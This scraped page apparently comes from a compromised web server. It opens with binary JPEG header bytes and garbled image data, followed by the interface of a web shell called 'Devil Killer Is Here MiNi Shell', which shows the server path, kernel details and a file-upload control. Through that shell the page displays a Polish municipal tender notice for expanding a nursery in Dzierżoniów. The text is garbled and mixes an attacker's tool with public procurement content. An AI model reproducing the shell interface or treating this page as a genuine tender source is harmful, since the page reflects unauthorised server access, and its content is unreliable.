JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240326/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240326/0025995401-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Rozbudowa i przebudowa budynku Żłobka Miejskiego w Dzierżoniowie w ramach programu rozwoju instytucji opieki nad dziećmi w wieku do lat 3 &#34;Maluch +&#34; 2022 - 2029&#34;. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miejska Dzierżoniów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 890717830</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dzierżoniów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL517 - Wałbrzyski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 746450397</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48746415530</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@um.dzierzoniow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://dzierzoniow.ezamawiajacy.pl/, https://bip.um.dzierzoniow.pl/, https://dzierzoniow.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Rozbudowa i przebudowa budynku Żłobka Miejskiego w Dzierżoniowie w ramach programu rozwoju instytucji opieki nad dziećmi w wieku do lat 3 &#34;Maluch +&#34; 2022 - 2029&#34;. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7fd54185-eb4f-11ee-9c02-ce2b643d361d</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00259954</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-03-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00016735/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Rozbudowa i przebudowa Żłobka Miejskiego w Dzierżoniowie w ramach rozwoju instytucji opieki nad dziećmi w wieku do lat 3 „MALUCH +” 2022-2029</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> FERS: Opieka nad dziećmi do lat 3 – program Maluch+ 2022-2029, współfinansowany z Krajowego Planu na rzecz Odbudowy i Zwiększenia odporności (KPO). </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://dzierzoniow.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://dzierzoniow.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Niezbędne wymagania sprzętowo -<br/>aplikacyjne umożliwiające pracę na platformie zakupowej<br/>eZamawiajacy, tj.: Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512<br/>kb/s; Komputer klasy PC lub MAC spełniający wymagania zainstalowanego systemu operacyjnego oraz wymagania używanej<br/>przeglądarki internetowej. Zainstalowana dowolna przeglądarka internetowa w wersji wspieranej przez producenta obsługująca TLS<br/>1.2.<br/>Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf. Zamawiający<br/>określa informacje na temat kodowania i czasu odbioru danych tj.: Plik załączony przez Wykonawcę na<br/>Platformie Zakupowej i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format kodowania<br/>UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po<br/>upływie terminu otwarcia ofert. Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz<br/>dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego odpowiednim<br/>źródłem czasu. Zamawiający określił dopuszczalne formaty przesyłanych danych w SWZ tj. plików o<br/>wielkości do 2 GB. Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .docx .rtf .xls .jpg<br/>(.jpeg) ze szczególnym wskazaniem na .pdf. W celu ewentualnej kompresji danych Zamawiający<br/>rekomenduje wykorzystanie jednego z formatów: .zip lub .7Z. Wymagania techniczne i organizacyjne<br/>sporządzania, wysyłania i odbierania korespondencji elektronicznej zostały opisane na Platformie w<br/>zakładce „Baza Wiedzy/Plany zamówień publicznych” pod adresem internetowym<br/>https://dzierzoniow.ezamawiajacy.pl/. Wszelką korespondencję związaną z postępowaniem, należy<br/>przekazywać za pośrednictwem Platformy. Korespondencję uważa się za przekazaną w terminie, jeżeli<br/>dotrze do Zamawiającego przed upływem wymaganego terminu. Każda ze stron na żądanie drugiej<br/>niezwłocznie potwierdzi fakt otrzymania wiadomości elektronicznej.<br/>Oferta wraz z załącznikami musi zostać w ogólnie przyjętych formatach danych i<br/>złożona w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej<br/>podpisem osobistym albo podpisem zaufanym pod rygorem nieważności.<br/>Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów<br/>musi być zgodny z wymogami określonymi w Rozporządzeniu Prezesa Rady Ministrów z dnia 30<br/>grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz Rozporządzeniu Ministra<br/>Rozwoju, Pracy i Technologii z<br/>dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń, jakich może żądać zamawiający od wykonawcy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że: Administratorem Danych jest Gmina Miejska<br/>Dzierżoniów reprezentowana przez Burmistrza Dzierżoniowa ul. Rynek 1, 58-200 Dzierżoniów tel. 74<br/>645 0800; Inspektor Ochrony Danych - Kontakt: Urząd Miasta w Dzierżoniowie, ul. Rynek 1, pok. 22<br/>tel. 74 645 0808, e-mail: inspektorodo@um.dzierzoniow.pl; Będziemy przetwarzać Twoje dane w celu przeprowadzenia zamówienia<br/>publicznego, a w przypadku wyboru najkorzystniejszej oferty w celu zawarcia i realizacji umowy, Będziemy przetwarzać Twoje dane<br/>na podstawie: 1. Art. 6 ust. 1 lit. c RODO, tj. przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego na<br/>administratorze 2. Ustawy z dnia 11.09.2019r. Prawo zamówień publicznych wraz z aktami wykonawczymi do ustawy 3. Ustawy z<br/>dnia 27.08.2009r. o finansach publicznych. W przypadku wyboru<br/>najkorzystniejszej oferty również na podstawie art. 6 ust. 1 lit. b) RODO- tj. przetwarzanie jest<br/>niezbędne do wykonania umowy, której stroną jest osoba, której dane dotyczą lub do podjęcia działań<br/>na żądanie osoby, której dane dotyczą przed zawarciem umowy; Twoje dane osobowe będą<br/>przechowywane przez okres wynikający z jednolitego rzeczowego wykazu akt lub przez okres<br/>trwałości<br/>projektu dofinansowanego ze źródeł zewnętrznych wynikający z odrębnych przepisów prawa;<br/>Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp; Odbiorcy Twoich danych - Twoje dane osobowe w postaci nazwy/imienia i nazwiska oraz<br/>adresu prowadzenia działalności gospodarczej mogą zostać udostępnione:- w Biuletynie Zamówień<br/>Publicznych / w Dzienniku Urzędowym Unii Europejskiej,- na Platformie Zakupowej eZamawiający,-w<br/>Biuletynie Informacji Publicznej Urzędu Miasta w Dzierżoniowie,-wykonawcom biorącym udział w<br/>postępowaniu,-organom upoważnionym na mocy przepisów prawa,-wykonawcom świadczącym usługi<br/>na rzecz Zamawiającego, min. firma Market Planet Otwarty Rynek Elektroniczny S.A.-dostawca<br/>platformy zakupowej do obsługi zamówień publicznych.Ponadto po zawarciu umowy w/w dane mogą<br/>zostać udostępnione każdej osobie, która wystąpi z wnioskiem o ich udostępnienie w trybie dostępu do<br/>informacji publicznej (jeśli nie będą zachodziły przesłanki wyłączające); Twoje prawa związane z<br/>przetwarzaniem danych osobowych - Przysługują Ci, w sytuacjach określonych prawem, następujące<br/>prawa związane z przetwarzaniem danych osobowych:- na podstawie art. 15 RODO prawo dostępu do<br/>danych osobowych Pani/Pana dotyczących;- na podstawie art. 16 RODO prawo do sprostowania<br/>Pani/Pana danych osobowych ;- na podstawie art. 18 RODO prawo żądania od administratora<br/>ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18<br/>ust. 2 RODO ; - prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy<br/>uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;Nie przysługuje Ci:- w<br/>związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych<br/>osobowych;- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;- na<br/>podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą<br/>prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. Klauzula<br/>informacyjna stanowi załącznik nr 9 do SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZI-1.271.36.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.1. Przedmiotem zamówienia jest wykonanie robót budowlanych związanych z realizacją zadania inwestycyjnego pn.: „Rozbudowa i przebudowa Żłobka Miejskiego w Dzierżoniowie w ramach programu rozwoju instytucji opieki nad dziećmi w wieku do lat 3 „Maluch +” 2022 – 2029”. Zadanie objęte jest dofinansowaniem w ramach programu „Maluch +” 2022-2029 ze środków KPO oraz Budżetu Państwa. <br/> 1.2. Zakres przedmiotu zamówienia, o którym mowa powyżej, który dotyczy wykonania robót budowlanych związanych z rozbudową i przebudową Żłobka Miejskiego w Dzierżoniowie, <br/>w oparciu o posiadaną przez Zamawiającego dokumentację projektową, dla której została wydana przez Starostę Dzierżoniowskiego decyzja pozwolenia na budowę nr 60/2024 z dnia 09 lutego2024r., w szczególności obejmuje:<br/>1) przebudowę i rozbudowę budynku Żłobka Miejskiego, w celu utworzenia dodatkowego oddziału dla 25 dzieci;<br/>2) wykonanie instalacji wewnętrznych, w tym montaż, według zestawienia wyposażenia łazienkowego, dozowników na papier toaletowy, mydło, ręczniki papierowe i lustra okrągłe 600mm montowane na ścianie; <br/>3) utwardzenie terenu - ciągi piesze;<br/>4) montaż małej architektury – plac zabaw; Dodatkowo Wykonawca zobowiązany jest umieścić na urządzeniach zabawowych naklejki (odporne na warunki atmosferyczne) zgodnie z zasadami wskazanymi w Księdze Identyfikacji Wizualnej Krajowego Planu Odbudowy; Natomiast zdemontowane drewniane urządzenia zabawowe Wykonawca przekaże do Przedszkola nr 3 na os. Błękitnym 26 (na przeciwko Żłobka) i złoży je w miejscu wskazanym przez Dyrektora Przedszkola;<br/>5) wykonanie przyłączy kanalizacji deszczowej i sanitarnej;<br/>6) karczowanie 10 korzeni na terenie żłobka. Zamawiający usunął 10 drzew na podstawie Decyzji RL.613.212.2023 z dnia 09.02.2024r.;<br/>7) wykonanie, zgodnie z wytycznymi Programu rozwoju instytucji opieki nad dziećmi w wieku do lat 3 „Maluch+”, 2 tablic informacyjnych o wym. 120 cm x 60 cm, które należy zamontować na ogrodzeniu Żłobka. Tablice muszą być odporne na warunki atmosferyczne. Wygląd tablic i ich treść musi być zaakceptowana przez Zamawiającego. Tablice należy zamontować niezwłocznie po rozpoczęciu fizycznej realizacji zadania. Informacje na temat tablic można znaleźć na stronie:<br/>https://www.duw.pl/pl/urzad/programy/program-rozwoju-instytu/18594,Program-rozwoju-instytucji-opieki-nad-dziecmi-w-wieku-do-lat-3-quot-Maluch-quot-.html<br/><br/>Zakres rzeczowy zadania nie dotyczy dostawy i montażu mebli.<br/><br/>1.3 Roboty budowlane należy wykonać z uwzględnieniem likwidacji barier architektonicznych dla osób z niepełnosprawnościami oraz z zasadą nieczynienia szkody środowisku – DNSH.<br/><br/>1.4 Szczegółowy zakres przedmiotu zamówienia w zakresie zamówienia został określony w:<br/>1) decyzji pozwolenia na budowę nr 60/2024 z dnia 09 lutego 2024r., wydanej przez Starostę Dzierżoniowskiego;<br/>2) projekcie zagospodarowania terenu pn.: „Rozbudowa i przebudowa Żłobka Miejskiego wraz z zagospodarowaniem terenu i infrastrukturą techniczną”;<br/>3) projekcie architektoniczno-budowlanym wraz z opinią geotechniczną pn.: „Rozbudowa i przebudowa Żłobka Miejskiego wraz z zagospodarowaniem terenu i infrastrukturą techniczną”;<br/>4) projekcie wykonawczym zagospodarowania terenu – Architektura - pn.: „Rozbudowa i przebudowa Żłobka Miejskiego wraz z zagospodarowaniem terenu i infrastrukturą techniczną”;<br/>5) projekcie technicznym pn.: „Rozbudowa i przebudowa Żłobka Miejskiego wraz z zagospodarowaniem terenu i infrastrukturą techniczną”;<br/> 6) projekcie technicznym – wykonawczym – instalacje sanitarne pn.: „Rozbudowa i przebudowa Żłobka Miejskiego wraz z zagospodarowaniem terenu i infrastrukturą techniczną”;<br/>7) projekcie technicznym – wykonawczym – instalacje elektryczne pn.: „Rozbudowa i przebudowa Żłobka Miejskiego wraz z zagospodarowaniem terenu i infrastrukturą techniczną”;<br/>8) projekcie wykonawczym – konstrukcja pn.: „Rozbudowa i przebudowa Żłobka Miejskiego wraz z zagospodarowaniem terenu i infrastrukturą techniczną”;<br/>9) projekcie aranżacji i wykończenia ścian pn.: „Rozbudowa i przebudowa Żłobka Miejskiego wraz z zagospodarowaniem terenu i infrastrukturą techniczną”;<br/>10) specyfikacji technicznej wykonania i odbioru robót budowlanych pn.: „Rozbudowa i przebudowa Żłobka Miejskiego wraz z zagospodarowaniem terenu i infrastrukturą techniczną”.<br/><br/>1.5. Wykonawca zobowiązany jest do wykonania zakresu robót wskazanych w projekcie umowy,<br/>w dokumentacji projektowej, w tym projekcie budowlanym, wykonawczym i projekcie aranżacji i wykończenia wnętrz, który jest określony w formie opisu technicznego lub na rysunkach lub równocześnie w opisie i na rysunkach. Zarówno opis techniczny jak i rysunki (część graficzna) projektów są równoważne i opisują przedmiot zamówienia.<br/><br/>1.6. Wykonawca zobowiązany jest do wykonania robót budowlanych zgodnie ze sztuką budowlaną, zaleceniami nadzoru inwestorskiego, ww. dokumentacją z uwzględnieniem likwidacji barier architektonicznych dla osób z niepełnosprawnościami.<br/><br/>1.7. Wykonawca w związku z dofinansowaniem zadania zobowiązany jest do eksponowania w wytwarzanych dokumentach źródeł dofinansowania zadania tj. znakiem Unii Europejskiej (złożonym z flagi UE i napisu „Dofinansowanie przez Unię Europejską”), znakiem Krajowego Planu Odbudowy i znakiem barw Rzeczypospolitej Polskiej (złożonym z barw RP oraz nazwy Rzeczpospolita Polska).<br/><br/>1.8. Zamawiający informuje, że w trakcie wykonywania robót budowlanych, istniejąca część Żłobka będzie czynna. W godzinach od 11:00 do 13:00 odbywa się odpoczynek dzieci, wówczas należy ograniczyć lub wyłączyć z pracy sprzęt mechaniczny generujący hałas. W miesiącu lipcu w Żłobku będzie przerwa wakacyjna dla dzieci, wówczas roboty budowlane będzie można prowadzić nie przerwanie i bez żadnych ograniczeń a szczególnie wewnątrz istniejącej części Żłobka. W soboty będzie możliwość pracy w istniejącej części Żłobka, po jej uzgodnieniu z Dyrektorem Żłobka.<br/>Szczegółowy opis przedmiotu zamówienia znajduje się w Specyfikacji Warunków Zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45210000-2 - Roboty budowlane w zakresie budynków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45261000-4 - Wykonywanie pokryć i konstrukcji dachowych oraz podobne roboty</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45312100-8 - Instalowanie przeciwpożarowych systemów alarmowych</p> <p class="mb-0">45316000-5 - Instalowanie systemów oświetleniowych i sygnalizacyjnych</p> <p class="mb-0">45332000-3 - Roboty instalacyjne wodne i kanalizacyjne</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45331200-8 - Instalowanie urządzeń wentylacyjnych i klimatyzacyjnych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta Wykonawcy, który spełni wszystkie postawione w SWZ<br/>warunki, nie podlega wykluczeniu z postępowania, złoży ofertę<br/>niepodlegającą odrzuceniu oraz uzyska łącznie największą liczbę punktów stanowiących sumę punktów przyznanych w ramach<br/>każdego z podanych kryteriów. Łączna ilość punktów uzyskanych przez ofertę zostanie obliczona według wzoru:<br/>K = KC + KG + KS<br/>K – łączna ilość punktów uzyskana przez ofertę,<br/>KC – punkty uzyskane w kryterium „cena brutto”,<br/>KG – punkty uzyskane w kryterium „przedłużenie okresu gwarancji i rękojmi”.<br/>KS – punkty uzyskane w kryterium „zatrudnienie osób wymienionych w katalogu określonym w art. 96 ust. 2 pkt 2 ustawy Pzp”.<br/>Końcowy wynik powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku. Za najkorzystniejszą zostanie wybrana<br/>oferta, która zgodnie z powyższymi kryteriami oceny ofert uzyska najwyższą liczbę punktów spośród ofert nie podlegających<br/>odrzuceniu. Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans<br/>ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybiera ofertę, która otrzymała najwyższą ocenę w kryterium o<br/>najwyższej wadze.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe 